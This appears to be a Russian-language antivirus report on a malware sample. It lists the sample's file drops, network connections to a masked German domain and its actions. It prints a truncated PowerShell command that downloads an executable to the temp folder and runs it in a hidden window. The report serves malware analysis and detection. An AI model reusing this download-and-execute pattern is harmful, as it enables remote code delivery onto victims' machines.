Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $lnk как %temp%\einnbv.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function dwn([String] $lnk){(New-Object System.Net.WebClient).DownloadFile($lnk,''%TMP%\einnbv.exe'');Start-Process ''%TMP%\einnbv.exe'';}try{dwn(''http://th#######...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1476
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1357005.cvr
- %TEMP%\mxaznw.bat
Сетевая активность
Подключается к
- 'th#######entrum-stralsund.de':80
- 'th#######entrum-stralsund.de':443
TCP
Запросы HTTP GET
- http://th#######entrum-stralsund.de/fiftyyearsnoth35.png
- http://www.th#######entrum-stralsund.de/fiftyyearsnoth35.png
Другие
- 'th#######entrum-stralsund.de':443
UDP
- DNS ASK th#######entrum-stralsund.de
- DNS ASK si####sfineart.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function dwn([String] $lnk){(New-Object System.Net.WebClient).DownloadFile($lnk,''%TMP%\einnbv.exe'');Start-Process ''%TMP%\einnbv.exe'';}try{dwn(''http://th#######...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Mxaznw.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Mxaznw.bat" "
